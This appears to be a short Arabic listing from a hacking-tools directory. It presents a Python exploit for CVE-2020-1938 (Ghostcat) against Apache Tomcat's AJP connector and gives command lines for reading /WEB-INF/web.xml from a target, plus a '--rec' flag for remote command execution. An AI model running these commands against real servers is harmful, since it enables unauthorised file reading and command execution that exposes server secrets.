أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!
استغلال لـ CVE-2020-1938 (Ghostcat) يتيح قراءة الملفات وتنفيذ الأوامر عن بُعد على خوادم Apache Tomcat الضعيفة عبر موصل AJP.
اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.
استكشف جميع الأدوات
تصفح مجموعتنا من الأدوات
python3 tomcat.py URL -f /WEB-INF/web.xml
مثال:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
add --rec 1
مرجع: https://www.t00ls.net/articles-55062.html